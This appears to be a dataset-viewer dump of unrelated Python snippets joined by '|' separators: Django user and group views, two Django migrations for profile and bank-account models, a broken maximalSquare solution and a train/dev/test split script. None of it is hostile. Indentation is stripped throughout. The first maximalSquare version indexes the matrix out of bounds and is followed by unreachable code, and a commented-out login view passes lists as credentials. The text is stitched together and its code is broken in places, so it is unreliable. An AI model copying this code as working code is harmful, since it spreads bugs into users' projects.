kwargs['list_groups'] = CustomGroup.objects.all().order_by('title')
return super().get_context_data(**kwargs)
class UpdateGRP(CustomSuccessMessageMixin,UpdateView):
model = CustomGroup
template_name = 'groups/groups.html'
form_class = GroupForm
success_url = reverse_lazy('groups')
success_msg = 'Группа успешно обновлена'
def get_context_data(self,**kwargs):
kwargs['update'] = True
return super().get_context_data(**kwargs)
def group_detail(request, slug):
group = CustomGroup.objects.get(slug__iexact=slug)
template = 'groups/group_detail.html'
context = {
'group': group
}
return render(request, template, context)
# Работа с пользователями
class AddUser(CustomSuccessMessageMixin, CreateView):
model = CustomUser
template_name = 'users.html'
form_class = AddUserForm
success_url = reverse_lazy('users')
success_msg = 'Пользователь добавлен'
def get_context_data(self,**kwargs):
kwargs['list_users'] = CustomUser.objects.all().order_by('username')
return super().get_context_data(**kwargs)
class UpdateUser(CustomSuccessMessageMixin, UpdateView):
model = CustomUser
template_name = 'users.html'
form_class = UpdateUserForm
success_url = reverse_lazy('users')
success_msg = 'Пользователь успешно обновлен'
def get_context_data(self,**kwargs):
kwargs['update'] = True
return super().get_context_data(**kwargs)
class DelUser(DeleteView):
model = CustomUser
template_name = 'users.html'
success_url = reverse_lazy('users')
success_msg = 'Пользователь удален'
def post(self,request,*args,**kwargs):
messages.success(self.request, self.success_msg)
return super().post(request)
class UpdatePass(CustomSuccessMessageMixin,UpdateView):
model = CustomUser
template_name = 'users.html'
form_class = UpdatePassword
success_url = reverse_lazy('users')
success_msg = 'Пароль успешно обновлен'
def get_context_data(self,**kwargs):
kwargs['update'] = True
return super().get_context_data(**kwargs)
#class Home(ListView):
# model = Cameras
# template_name = 'index.html'
# context_object_name = 'list_cameras'
#def login_page(request):
# if request.method == 'POST':
# form = AuthUserForm(request.POST)
# if form.is_valid():
# username = request.POST['username']
# password = request.POST['password']
# user = authenticate(username=['username'], password=['password'])
# if user is not None:
# if user.is_active:
# login(request, user)
# return HttpResponse('Authenticated successfully')
# else:
# return HttpResponse('Disabled account')
# else:
# return HttpResponse('Invalid login')
# else:
# form = AuthUserForm()
# return render(request, 'login.html', {'form': form})
|
class Solution:
def maximalSquare(self, matrix):
# Dynamic programming, time O(mn), space O(mn)
if not matrix: return 0
rows = len(matrix) + 1
cols = len(matrix[0]) + 1
maxLength = 0
dp = [[0] * (cols + 1) for _ in range(rows + 1)]
for i in range(1, rows + 1):
for j in range(1, cols + 1):
if matrix[i][j] == '1':
dp[i][j] = min(dp[i-1][j], dp[i][j-1], dp[i-1][j-1]) + 1
maxLength = max(maxLength, dp[i][j])
return maxLength * maxLength
# better Dynamic Programming, time O(mn), space O(m)
if not matrix: return 0
rows = len(matrix)
cols = len(matrix[0])
dp = [0] * (cols + 1)
maxsqlen = 0
prev = 0
for i in range(1, rows + 1):
for j in range(1, cols + 1):
temp = dp[j]
if matrix[i - 1][j - 1] == '1':
dp[j] = min(dp[j - 1], prev, dp[j]) + 1
maxsqlen = max(maxsqlen, dp[j])
else:
dp[j] = 0
prev = temp
return maxsqlen * maxsqlen |
# Generated by Django 3.0.1 on 2020-07-19 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0023_auto_20200719_1546'),
]
operations = [
migrations.AlterField(
model_name='userprofileinfo',
name='profile_pic',
field=models.ImageField(default='static/default.jpg', upload_to='profile_pics'),
),
]
|
import sys
import jsonlines
import random
import json
import os
from itertools import chain
from collections import defaultdict
def split_seq(seq, limit):
if len(seq) > limit:
return split_seq(seq[:int(len(seq)/2)], limit) + split_seq(seq[int(len(seq)/2):], limit)
else:
return [seq]
def validate_line(line, lookup):
return len(line.split()) > 2 and all([lookup.get(pid) for pid in line.split()])
if __name__ == "__main__":
input_file = sys.argv[1]
train_prop = float(sys.argv[2])
limit = int(sys.argv[3])
counts = defaultdict(int)
sequences = []
with open(input_file) as f:
for line in f.readlines():
if len(line.strip().split()) > 3:
sequences += split_seq(['<s>'] + line.strip().split(), 16)
train_par = int(len(sequences) * train_prop)
test_par = int((len(sequences) * (1-train_prop)) / 2)
random.shuffle(sequences)
train = sequences[:train_par]
dev = sequences[train_par:-test_par]
test = sequences[-test_par:]
dirname, basename = os.path.split(input_file)
print(len(train))
print(len(dev))
print(len(test))
with open(os.path.join(dirname, 'train_'+basename), 'w') as f:
f.write('\n'.join(map(lambda x: ' '.join(x), train)))
with open(os.path.join(dirname, 'test_'+basename), 'w') as f:
f.write('\n'.join(map(lambda x: ' '.join(x), test)))
with open(os.path.join(dirname, 'dev_'+basename), 'w') as f:
f.write('\n'.join(map(lambda x: ' '.join(x), dev)))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-07-25 08:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('sites', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='BankAccount',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('street', models.CharField(max_length=100, verbose_name='Street')),
('postal_code', models.CharField(max_length=100, verbose_name='Postal code')),
('place', models.CharField(max_length=100, verbose_name='Place/City')),
('country_code', models.CharField(default='CH', max_length=2, verbose_name='Country code')),
('country_name', models.CharField(default='Switzerland', max_length=100, verbose_name='Country')),
('iban', models.CharField(blank=True, max_length=42, verbose_name='IBAN')),
('number', models.CharField(blank=True, max_length=42, verbose_name='Number')),
('bic', models.CharField(blank=True, max_length=11, verbose_name='BIC')),
('currency_code', models.CharField(default='CHF', max_length=3, verbose_name='Currency ISO code')),
],
),
migrations.CreateModel(
name='Ownership',
fields=[
('site', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='sites.Site')),
('company_name', models.CharField(blank=True, max_length=50, null=True, verbose_name='Company name')),
('company_department', models.CharField(blank=True, max_length=50, verbose_name='Company department')),
('first_name', models.CharField(blank=True, max_length=30, null=True, verbose_name='First name')),
('last_name', models.CharField(blank=True, max_length=30, null=True, verbose_name='Last name')),
('email', models.EmailField(max_length=254, verbose_name='Email')),
('street', models.CharField(max_length=100, verbose_name='Street')),
('postal_code', models.CharField(max_length=100, verbose_name='Postal code')),
('place', models.CharField(max_length=100, verbose_name='Place/City')),
('country_code', models.CharField(default='CH', max_length=2, verbose_name='Country code')),
('country_name', models.CharField(default='Switzerland', max_length=100, verbose_name='Country')),
('phone', models.CharField(blank=True, max_length=32, null=True, verbose_name='Phone')),
('fax', models.CharField(blank=True, max_length=32, null=True, verbose_name='Fax')),
('vat_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='VAT number')),
('logo', models.ImageField(blank=True, null=True, upload_to='ownership', verbose_name='Logo')),
('logo_invoice', models.ImageField(blank=True, null=True, upload_to='ownership', verbose_name='Logo invoice')),
('stripe_public_key', models.CharField(blank=True, max_length=32, null=True, verbose_name='Stripe public key')),
],
),
migrations.AddField(
model_name='bankaccount',
name='owner',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bankaccounts', to='imprint.Ownership'),
),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.